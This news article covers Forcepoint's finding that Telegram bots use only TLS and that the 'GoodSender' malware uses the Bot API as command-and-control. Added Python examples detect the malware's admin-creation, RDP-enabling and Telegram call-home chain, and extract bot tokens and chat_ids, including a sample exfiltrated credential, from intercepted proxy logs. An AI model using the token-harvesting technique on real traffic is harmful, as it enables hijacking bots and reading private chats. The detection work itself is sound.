Alert from the cybersecurity company Forcepoint: the firm recommends that all users avoid bots on the Telegram platform because of a flaw
Many users have adopted the messaging application Telegram as a supposedly more private alternative to its competitors WhatsApp and Facebook Messenger. The messenger has positioned itself as an encrypted communication application for people who are more concerned about surveillance and censorship. However, new research by Forcepoint, a cybersecurity firm, has revealed a serious weakness in the security and confidentiality of the tool. According to the findings, the application has been used as command-and-control (C2) infrastructure for malware. In a post published on the company's blog, security researcher Abel Toro explained how cybercriminals can take advantage of the Telegram Bot API to communicate with malware.
Telegram bots are programs that can be added to private chats or public channels and that run and automate specific functions. Examples include custom keyboards, memes on demand and even payment transactions. The bot platform has been supported by Telegram since 2015 and is popular because it is convenient and fun. However, what Forcepoint discovered while investigating the Bot API is that the feature does not use the encryption Telegram applies to protect chats between users. Thus, adding a bot to a chat or channel makes the platform less secure and makes it easier for an attacker to intercept messages.
"Because of the way the Bot API works, all of a bot's past messages can be read by an adversary who can intercept and decrypt HTTPS traffic. The adversary has the complete history of all the messages sent or received by the target bot. This often includes messages between regular users, because bots often share a group chat with them," Toro explained.
Telegram uses its own MTProto encryption, layered on top of TLS, to protect messages between regular users; according to the company, TLS alone is not secure enough for an encrypted messaging application. However, Toro says this does not apply to programs that use the Telegram Bot API, and that messages sent this way are protected only by the HTTPS layer. "To make matters worse, any adversary who obtains the key information carried in each message can not only access the messages in transit, but also retrieve the full history of the messages of the target bot."
According to Forcepoint, the malware in question is fairly simple: it is written in .NET, its operator goes by the name "GoodSender", and it uses Telegram as its C2. Once installed, the malware creates a new administrator user and enables Remote Desktop, making sure the feature is not blocked by the firewall. The username of the new administrator is static, but the password is randomly generated. All this information (username, password and the victim's IP address) is sent to the operator over the Telegram network, allowing them to access the victim's computer via RDP.
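The behaviour described above (a new local administrator, Remote Desktop switched on, then a call home to Telegram) is a sequence a defender can correlate on the host. The following is an added example, not code from Forcepoint or from the article, and not the malware itself. It runs a small stage-based correlation over constructed Windows Security and Sysmon events: membership added to the local Administrators group (Security event 4732), the Terminal Server `fDenyTSConnections` value set to 0 or a `netsh` rule enabling the "remote desktop" group (Sysmon events 13 and 1), and a DNS query for api.telegram.org (Sysmon event 22). The event field names, the host names, the process path `update.exe`, the user name `support_admin` and the ten-minute window are all assumptions made for the example.

```python
import re
from datetime import datetime, timedelta

# Constructed sample events for the example (not real logs). Field names are
# simplified from Windows Security / Sysmon event data; map them to your
# SIEM's schema before use.
EVENTS = [
    {"t": "2019-01-15T10:01:50Z", "host": "WS-042", "source": "Security", "id": 4720,
     "target_user": "support_admin"},
    {"t": "2019-01-15T10:01:51Z", "host": "WS-042", "source": "Security", "id": 4732,
     "target_user": "support_admin", "group": "Administrators"},
    {"t": "2019-01-15T10:01:53Z", "host": "WS-042", "source": "Sysmon", "id": 13,
     "image": "C:\\Users\\bob\\AppData\\Roaming\\update.exe",
     "target_object": "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\fDenyTSConnections",
     "details": "DWORD (0x00000000)"},
    {"t": "2019-01-15T10:01:55Z", "host": "WS-042", "source": "Sysmon", "id": 1,
     "image": "C:\\Windows\\System32\\netsh.exe",
     "cmdline": 'netsh advfirewall firewall set rule group="remote desktop" new enable=Yes'},
    {"t": "2019-01-15T10:02:10Z", "host": "WS-042", "source": "Sysmon", "id": 22,
     "image": "C:\\Users\\bob\\AppData\\Roaming\\update.exe", "query": "api.telegram.org"},
    # Benign control: IT creates a local admin elsewhere, with no RDP change
    # and no Telegram traffic. This must not raise an alert.
    {"t": "2019-01-15T11:30:00Z", "host": "WS-077", "source": "Security", "id": 4720,
     "target_user": "helpdesk"},
    {"t": "2019-01-15T11:30:01Z", "host": "WS-077", "source": "Security", "id": 4732,
     "target_user": "helpdesk", "group": "Administrators"},
]

WINDOW = timedelta(minutes=10)  # assumed: all stages land within 10 minutes
REQUIRED = {"new_admin", "rdp_enabled", "telegram_c2"}


def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def stage_of(ev):
    """Map one event to a stage of the chain described in the article, or None."""
    src, eid = ev["source"], ev["id"]
    if src == "Security" and eid == 4732 and ev.get("group", "").lower() == "administrators":
        return "new_admin"  # account added to the local Administrators group
    if (src == "Sysmon" and eid == 13
            and ev.get("target_object", "").lower().endswith("fdenytsconnections")
            and "0x00000000" in ev.get("details", "")):
        return "rdp_enabled"  # fDenyTSConnections = 0 turns Remote Desktop on
    if src == "Sysmon" and eid == 1 and re.search(r'remote desktop.*enable=yes',
                                                   ev.get("cmdline", ""), re.I):
        return "rdp_enabled"  # firewall rule group for RDP enabled via netsh
    if src == "Sysmon" and eid == 22 and ev.get("query", "").lower().endswith("telegram.org"):
        return "telegram_c2"  # DNS lookup of the Bot API host by a local process
    return None


def find_chains(events, window=WINDOW):
    """Return one alert per host where all three stages occur within `window`
    of an Administrators-group addition."""
    by_host = {}
    for ev in sorted(events, key=lambda e: parse_ts(e["t"])):
        stage = stage_of(ev)
        if stage:
            by_host.setdefault(ev["host"], []).append((parse_ts(ev["t"]), stage, ev))
    alerts = []
    for host, staged in by_host.items():
        for i, (t0, st0, ev0) in enumerate(staged):
            if st0 != "new_admin":
                continue
            seen = {"new_admin": ev0}
            for t, st, ev in staged[i + 1:]:
                if t - t0 > window:
                    break
                seen.setdefault(st, ev)  # keep the first event of each stage
            if REQUIRED <= set(seen):
                alerts.append({"host": host, "user": ev0.get("target_user"),
                               "first_seen": ev0["t"],
                               "c2_process": seen["telegram_c2"].get("image")})
                break  # one alert per host is enough
    return alerts


if __name__ == "__main__":
    for a in find_chains(EVENTS):
        print(a)
```

The correlation keys on the group-membership event rather than on account creation, because the article's point is the privilege gained, and it treats either the registry change or the netsh rule as evidence that RDP was enabled, since the malware has to do both for the operator's RDP session to succeed. A single stage on its own (an administrator created by IT, or a legitimate Telegram desktop client resolving api.telegram.org) does not alert.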
"Although Telegram is advertised as a secure messaging application and uses an encryption scheme with higher guarantees than TLS (at least in theory) for regular chats, bots use traditional TLS to encrypt data in transit," warned Toro. As a result, an attacker who can read that traffic could obtain the bot token as well as the chat_id, causing the total compromise not only of the current communication, but of all previous communications.
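The bot token and chat_id that Toro refers to travel in the clear inside the HTTPS request itself: Bot API calls have the form `https://api.telegram.org/bot<token>/<method>?chat_id=...`, and the token is the only credential the API checks. The following added example (not code from Forcepoint or the article) shows what a decrypting proxy or egress gateway can pull out of such traffic, and therefore what an adversary in the same position would hold. It parses constructed proxy log lines, extracts every bot token and the chat_ids it talks to, and produces a per-token summary with the token redacted for the alert. The log line format, the client IPs, the token value and the chat_ids are constructed for the example; the token regex assumes the `<bot id>:<35-character secret>` shape seen in practice and should be widened if your tokens differ.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Bot API URL: https://api.telegram.org/bot<token>/<method>[?chat_id=...&...]
# The token is "<numeric bot id>:<secret>". Assumption for this example:
# the secret part is 35 characters of [A-Za-z0-9_-]; widen if needed.
BOT_API_RE = re.compile(
    r"https?://api\.telegram\.org/bot(?P<token>\d+:[A-Za-z0-9_-]{35})/(?P<method>[A-Za-z]+)"
)

# Constructed sample of what a TLS-inspecting proxy would log for a
# bot-using client on the network. Not real traffic; the token is made up.
SAMPLE_PROXY_LOG = """\
2019-01-15T10:02:11Z 10.0.0.23 GET https://api.telegram.org/bot123456789:AAEx4Zr-9b7XkYxwQvF0sQm9dLp2cA7yTnw/getUpdates?offset=0 200
2019-01-15T10:02:13Z 10.0.0.23 POST https://api.telegram.org/bot123456789:AAEx4Zr-9b7XkYxwQvF0sQm9dLp2cA7yTnw/sendMessage?chat_id=-1001234567890&text=hello 200
2019-01-15T10:05:40Z 10.0.0.44 GET https://www.example.com/index.html 200
2019-01-15T10:06:02Z 10.0.0.23 POST https://api.telegram.org/bot123456789:AAEx4Zr-9b7XkYxwQvF0sQm9dLp2cA7yTnw/sendMessage?chat_id=987654321&text=admin%3AS3cret 200
"""


def extract_bot_credentials(log_text):
    """Return one finding per Bot API request: who sent it, with which token,
    which method, and to which chat (None when the method has no chat_id)."""
    findings = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        ts, client_ip, url = parts[0], parts[1], parts[3]
        m = BOT_API_RE.match(url)
        if not m:
            continue
        chat_id = parse_qs(urlsplit(url).query).get("chat_id", [None])[0]
        findings.append({"time": ts, "client": client_ip, "token": m["token"],
                         "method": m["method"], "chat_id": chat_id})
    return findings


def summarize(findings):
    """Group findings by token: which internal clients use it, which chats it
    reaches, and which methods were seen. This is the exposure an attacker
    reading the same traffic would have."""
    out = {}
    for f in findings:
        entry = out.setdefault(f["token"], {"clients": set(), "chat_ids": set(), "methods": set()})
        entry["clients"].add(f["client"])
        entry["methods"].add(f["method"])
        if f["chat_id"]:
            entry["chat_ids"].add(f["chat_id"])
    return out


def redact_token(token):
    """Keep the bot id (useful for triage) but never copy the secret into a
    ticket or alert, because the token alone is enough to act as the bot."""
    bot_id, _, _secret = token.partition(":")
    return f"{bot_id}:<redacted>"


if __name__ == "__main__":
    for token, info in summarize(extract_bot_credentials(SAMPLE_PROXY_LOG)).items():
        print(redact_token(token), sorted(info["clients"]), sorted(info["chat_ids"]), sorted(info["methods"]))
```

Without TLS inspection the token is not visible, but the destination is: a process other than a Telegram client resolving or connecting to api.telegram.org (visible in DNS logs or the TLS SNI) is the cheaper signal, and it is what the host-side correlation in the previous example keys on.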
Forcepoint therefore recommends that all users avoid Telegram bots, as well as channels and groups that have a bot in them.